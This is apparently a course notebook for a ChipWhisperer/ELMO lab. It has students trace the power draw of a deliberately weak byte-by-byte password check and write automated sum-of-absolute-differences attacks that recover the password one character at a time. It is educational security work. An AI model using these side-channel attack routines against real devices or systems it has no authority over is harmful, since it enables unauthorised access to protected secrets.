# Attack a password check

#### Learning goals:
- Learn how a "bad" password check looks like
- Learn how to run code from C files on ChipWhisperer
- Learn how to read output from ChipWhisperer

In [ ]:
%load_ext autoreload
%autoreload 2

import os

import plotly.graph_objects as pgo
import numpy as np

from securec.capture import capture

## 1. Record traces from passwordcheck.c

In [ ]:
data = capture(
    platform="elmo",
    number_of_traces=1,
    number_of_samples=100,
    fromfile=os.path.abspath("passwordcheck.c"),
    inputfunction=lambda _: 8 * [0],
)

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 1</div>

1. Understand [passwordcheck.c](passwordcheck.c). What is `setup()`, `run()`, and `teardown()`?
2. Think about problems in this C code. 
   What happens if `input` smaller than the stored password?

</div>

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 2</div>

1. Record traces with different inputs.
2. Plot the recorded traces. Is there a difference?

</div>

In [ ]:
data = capture(
    platform="elmo",
    number_of_traces=7,
    number_of_samples=100,
    fromfile=os.path.abspath("passwordcheck.c"),
    inputfunction=lambda i: [
        list(b"00000000"),
        list(b"i0000000"),
        list(b"in000000"),
        list(b"ina00000"),
        list(b"inb00000"),
        list(b"inc00000"),
        list(b"inf00000"),
    ][i],
)

fig = pgo.Figure()
for d in data:
    fig.add_trace(pgo.Scatter(y=d["trace"], name=bytes(d["input"]).decode()))
fig.show()

fig = pgo.Figure()
base_trace = data[-5]
for d in data[-4:]:
    fig.add_trace(
        pgo.Scatter(
            y=abs(base_trace["trace"] - d["trace"]),
            name=f'abs({bytes(base_trace["input"]).decode()} - {bytes(d["input"]).decode()})',
        )
    )
fig.show()

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 3</div>

Crack the password using the differences!

1. Write down the attack in pseudocode.
2. Implement an automated attack.

</div>

In [ ]:
import string


def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))


def capture_attempt(attempt):
    return capture(
        platform="elmo",
        number_of_traces=1,
        number_of_samples=200,
        fromfile=os.path.abspath("passwordcheck.c"),
        inputfunction=lambda _: attempt,
    )[0]["trace"]


def sad_attack(
    length_of_password=8,
    test_character=b"0",
    sad_threshold=1e-3,
    charlist=string.ascii_lowercase.encode(),
):
    attempt = []
    for _ in range(length_of_password):
        base_trace = capture_attempt(
            attempt
            + [test_character]
            + (length_of_password - len(attempt) - 1) * [test_character]
        )
        for char in charlist:
            trace = capture_attempt(
                attempt
                + [char]
                + (length_of_password - len(attempt) - 1) * [test_character]
            )
            if sad(base_trace, trace) >= sad_threshold:
                attempt.append(char)
                print(bytes(attempt))
                break
        else:
            return False, attempt
    return True, attempt


def sad_attack_nothreshold(
    length_of_password=8,
    charlist=string.ascii_lowercase.encode(),
):
    attempt = []

    for _ in range(length_of_password):
        data = capture(
            platform="elmo",
            number_of_traces=len(charlist),
            number_of_samples=2000,
            fromfile=os.path.abspath("passwordcheck.c"),
            inputfunction=lambda i: attempt + [charlist[i]],
        )["trace"]
        diffs1 = np.sum(np.abs(data - data[0, :]), axis=1)
        diffs2 = np.sum(np.abs(data - data[1, :]), axis=1)
        if np.mean(diffs1) <= np.mean(diffs2):
            diffs = diffs1
        else:
            diffs = diffs2
        attempt.append(charlist[np.argmax(diffs)])
        print(bytes(attempt))
    return attempt


sad_attack_nothreshold()

<div style="border: 3px solid plum; border-radius: 5px; padding: 5px; width: calc(100% - 20px);">
<div class="h2" style="font-variant: all-small-caps;">Exercise 4</div>

1. Change `stored_password` and download the program (execute `capture` once).
2. Exchange your ChipWhisperer with another student.
3. Can you crack the password of your colleague?

Hint: Download of a program can be skipped by:
```python
data = capture(
    ...
    code=None,
    fromfile=None,
    ...
)
```

</div>

## The sum of absolute differences
In this example we want to see how a technique called SAD (sum of absolute differences) is useful to auto-detect whether a character was correct or not.
Given two traces $t_1, t_2$ their SAD value is defined as:
$$\text{SAD}(t_1, t_2) := \sum_i \big| t_1[i] - t_2[i] \big|,$$
where $t[i]$ is the value of trace $t$ at point $i$.

This attack is an example for a _Timing attack_. Further information: https://en.wikipedia.org/wiki/Timing_attack